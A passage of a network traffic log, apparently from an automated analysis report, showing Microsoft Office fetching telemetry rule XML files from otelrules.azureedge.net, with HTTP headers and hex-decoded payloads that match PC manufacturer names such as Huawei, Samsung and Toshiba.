                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                        x-ms-request-id: 32f81047-301e-0051-4315-4138bb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114811Z-174f7845968qj8jrhC1EWRh41s000000119g000000007511
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:11 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        33192.168.2.44978213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:13 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:13 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:13 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 499
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                        x-ms-request-id: ff709020-001e-005a-1caf-42c3d0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114813Z-174f7845968cdxdrhC1EWRg0en00000011a00000000070y9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:13 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        34192.168.2.44978313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:13 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:13 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:13 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                        x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114813Z-174f7845968zgtf6hC1EWRqd8s0000000ubg000000004r0y
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:13 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        35192.168.2.44978413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:13 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:13 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:13 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                        x-ms-request-id: 8b97b4d7-e01e-0003-5405-410fa8000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114813Z-174f7845968pf68xhC1EWRr4h800000011h0000000008hqp
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:13 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        36192.168.2.44978513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:13 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:13 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:13 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                        x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114813Z-174f7845968vqt9xhC1EWRgten00000011hg00000000070u
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        37192.168.2.44978613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:13 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:13 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:13 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 494
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                        ETag: "0x8DC582BB8972972"
                                                                                        x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114813Z-174f78459685726chC1EWRsnbg00000011fg000000003eg7
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:13 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        38192.168.2.44978713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:15 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:15 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:15 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 420
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                        x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114815Z-174f7845968kdththC1EWRzvxn0000000dq0000000007fnn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:15 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        39192.168.2.44978813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:15 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:15 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:15 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                        x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114815Z-174f7845968pf68xhC1EWRr4h800000011rg000000000ywe
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        40192.168.2.44978913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:15 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:16 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:15 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                        x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114815Z-174f7845968xr5c2hC1EWRd0hn0000000k7g00000000625b
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:16 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        41192.168.2.44979013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:15 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:16 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:15 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                        x-ms-request-id: 390b1506-101e-0017-0101-4247c7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114815Z-174f7845968xlwnmhC1EWR0sv8000000116g000000006c50
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:16 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        42192.168.2.44979113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:15 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:16 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:15 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 423
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                        x-ms-request-id: 9dc9d887-801e-0015-73b3-42f97f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114815Z-174f7845968xlwnmhC1EWR0sv8000000115g000000007dm2
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:16 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        43192.168.2.44979213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:17 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
